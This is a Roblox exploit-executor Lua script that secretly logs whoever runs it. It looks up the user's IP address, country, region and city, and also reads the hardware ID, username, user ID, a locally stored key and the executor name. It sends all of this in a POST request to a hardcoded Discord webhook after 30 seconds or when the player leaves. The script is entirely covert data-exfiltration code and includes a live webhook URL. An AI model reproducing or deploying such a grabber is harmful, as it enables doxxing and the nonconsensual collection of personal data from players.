coroutine.wrap(function()
    local Logged = false
    local Player = game:GetService("Players").LocalPlayer
    local TimeExecuted = os.date("**Executed** on: %x %X%p %Z")
    local WhoIs = game.HttpService:JSONDecode(game:HttpGet('https://ipwho.is/'))
    local UserKey = ""

    if isfile(".vxhbksys") then
        UserKey = readfile(".vxhbksys")
    else
        UserKey = "NO KEY GENERATED"
    end

    function log()
        if Logged == false then
            Logged = true
            local executor = identifyexecutor()
            local Country = game:GetService("LocalizationService"):GetCountryRegionForPlayerAsync(Player)
            
            local url = "https://discord.com/api/webhooks/1309764426026717235/ZuqXJVQ04gIlVtUjthV5MHW3tOcxnUuZdUBj8Lcn_wzjH75OkEDz01TsqbZIcXFEDi2x"
            local data = {
                ["embeds"] = {
                    {
                        ["color"] = 16711680,
                        ["title"] = "User Logged",
                        ["description"] = "User has been logged",
                        ["fields"] = {
                            {
                                ["name"] = "Player Information:",
                                ["value"] = "**DisplayName:** "..Player.DisplayName.."\n**Username:** "..Player.Name.."\n**UserId:** "..Player.UserId
                            },
                            {
                                ["name"] = "Game Information:",
                                ["value"] = "**Game:** "..game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name.."\n**GameId:** "..game.GameId.."\n**PlaceId:** "..game.PlaceId
                            },
                            {
                                ["name"] = "Sensitive Information:",
                                ["value"] = "**IP:** ||"..WhoIs.ip.."||\n**Country:** ||"..WhoIs.country.."||\n**Region:** ||"..WhoIs.region.."||\n**City:** ||"..WhoIs.city.."||\n**HWID:** ||"..gethwid().."||"
                            },
                            {
                                ["name"] = "Other Information:",
                                ["value"] = "**Key:** "..UserKey.."\n**Executor:** "..executor.."\n**UserId:** "..Player.UserId.."\n"..TimeExecuted
                            },
                        },
                        ["thumbnail"] = {
                            ["url"] = "https://www.roblox.com/headshot-thumbnail/image?userId="..Player.UserId.."&width=420&height=420&format=png"
                        }
                    }
                }
            }
            
            
            local newdata = game:GetService("HttpService"):JSONEncode(data)
            
            local headers = {
               ["content-type"] = "application/json"
            }
            request = http_request or request or HttpPost or syn.request
            local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
            request(abcdef)
        end
    end
    game:GetService("Players").PlayerRemoving:Connect(function(PlayerRemoving)
        if PlayerRemoving.Name == Player.Name then
            log()
        end
    end)
    
    wait(30)
    log()
end)()
